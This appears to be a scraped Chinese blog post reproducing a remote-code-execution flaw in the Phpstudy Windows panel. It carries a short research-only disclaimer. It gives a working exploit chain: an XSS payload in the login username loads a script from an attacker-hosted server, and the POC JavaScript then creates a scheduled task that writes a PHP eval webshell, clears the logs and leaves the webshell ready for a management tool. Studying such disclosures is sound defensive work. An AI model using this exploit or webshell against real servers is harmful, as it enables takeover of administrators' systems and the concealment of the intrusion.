全屏网站设计,柳市做网站建设,wordpress windows 伪静态,品牌建设有哪些方面文章目录前言一、漏洞描述二、漏洞复现前言
本篇文章仅用于漏洞复现研究和学习#xff0c;切勿从事非法攻击行为#xff0c;切记#xff01; 一、漏洞描述
Phpstudy小皮面板存在RCE漏洞#xff0c;通过分析和复现方式发现其实本质上是一个存储型XSS漏洞导致的RCE。通过系…
文章目录前言一、漏洞描述二、漏洞复现前言
本篇文章仅用于漏洞复现研究和学习切勿从事非法攻击行为切记 一、漏洞描述
Phpstudy小皮面板存在RCE漏洞通过分析和复现方式发现其实本质上是一个存储型XSS漏洞导致的RCE。通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务实现RCE。
二、漏洞复现
首先去官网下载最新版的小皮Windows面板安装包程序
下载地址https://www.xp.cn/windows-panel.html 本地环境安装 安装完成之后会弹出一个txt文档里面包含访问地址如下所示 访问系统面板出现如下登录界面 首先在用户名登录的地方输入XSS代码验证是否存在漏洞 接着使用正确的账号密码进行登录加载完成之后出现弹窗。 如上图可以看到确实触发XSS弹窗这是因为整个系统在加载的过程中会读取操作日志的内容刚刚在用户名处插入的语句就是为了让系统操作日志进行记录以便登录成功之后加载js代码脚本所以执行显示了登录系统失败。 在当前这个系统界面上有一个计划任务的功能其中可以执行系统命令所以结合登录处的XSS漏洞可以通过写入计划任务来达到命令执行的目的。
操作步骤如下 在本地使用python开启一个http服务并且将poc脚本放在服务目录下进行利用。 POC
function poc(){$.get(/service/app/tasks.php?typetask_list,{},function(data){var iddata.data[0].ID;$.post(/service/app/tasks.php?typeexec_task,{tid:id},function(res2){$.post(/service/app/log.php?typeclearlog,{},function(res3){},json);},json);},json);
}
function save(){var datanew Object();data.task_id;data.titletest;data.exec_cycle1;data.week1;data.day3;data.hour14;data.minute 20;data.shellecho ?php eval($_POST[123]);? D:/xp.cn/www/wwwroot/admin/localhost_80/wwwroot/1.php;$.post(/service/app/tasks.php?typesave_shell,data,function(res){poc();},json);
}
save();PS这里需要清空日志避免重复触发。
紧接着在登录处用户名框中插入如下代码
script srchttp://X.X.X.X:8000/poc.js/script操作完成后只要管理员登录到系统插入的XSS代码就可以写入计划任务并执行通过计划任务就可以在服务器上写入文件。
当管理员登录成功后就会在对应路径下产生一个 1.php文件(文件内容自行定义) 因为小皮windows面板这个应用系统类似于宝塔所以其中会部署网站 当文件写入完成后即可通过WebShell管理工具进行连接。